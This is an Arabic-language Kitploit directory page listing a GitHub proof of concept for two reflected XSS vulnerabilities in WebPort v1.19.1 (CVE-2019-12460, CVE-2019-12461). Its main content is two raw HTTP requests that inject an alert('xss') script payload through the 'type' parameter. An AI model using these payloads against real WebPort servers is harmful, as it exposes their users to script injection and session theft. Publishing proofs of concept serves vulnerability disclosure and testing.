Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WebPort-v1.19.1-Reflected-XSS — CVE-2019-12460|Reflected XSS في WebPort-v1.19.1 يؤثر على المستخدمين الذين يفتحون رابطًا تم إنشاؤه بشكل ضار أو صفحة ويب تابعة لجهة خارجية. | Kitploit
أدوات/GitHubGitHub/emreovunc/webport-v1.19.1-reflected-xss
ماسحات الثغرات الأمنية للويبتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubemreovunc/webport-v1.19.1-reflected-xss

WebPort-v1.19.1-Reflected-XSS

CVE-2019-12460|Reflected XSS في WebPort-v1.19.1 يؤثر على المستخدمين الذين يفتحون رابطًا تم إنشاؤه بشكل ضار أو صفحة ويب تابعة لجهة خارجية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
33منذ 7 سنواتلم تتم المراجعة بعد

WebPort-v1.19.1-Reflected-XSS

يؤثر Reflected XSS في WebPort-v1.19.1 على المستخدمين الذين يفتحون رابطًا تم إنشاؤه بشكل خبيث أو صفحة ويب من طرف ثالث.

CVE-2019-12460

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12460

PoC-1

لاستغلال الثغرة، يمكن استخدام طلب 'http://[server]:8090/access/setup?type=" للتأثير على المستخدمين الذين يفتحون رابطًا تم إنشاؤه بشكل خبيث أو صفحة ويب من طرف ثالث.

root@kitploit:~
GET /access/setup?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E HTTP/1.1
Host: 172.16.165.182:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
Upgrade-Insecure-Requests: 1

alt tag

CVE-2019-12461

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461

PoC-2

لاستغلال الثغرة، يمكن استخدام طلب 'http://[server]:8090/log?type=" للتأثير على المستخدمين الذين يفتحون رابطًا تم إنشاؤه بشكل خبيث أو صفحة ويب من طرف ثالث.

root@kitploit:~
GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E HTTP/1.1
Host: 172.16.165.182:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
Upgrade-Insecure-Requests: 1

alt tag

تنزيل الأداة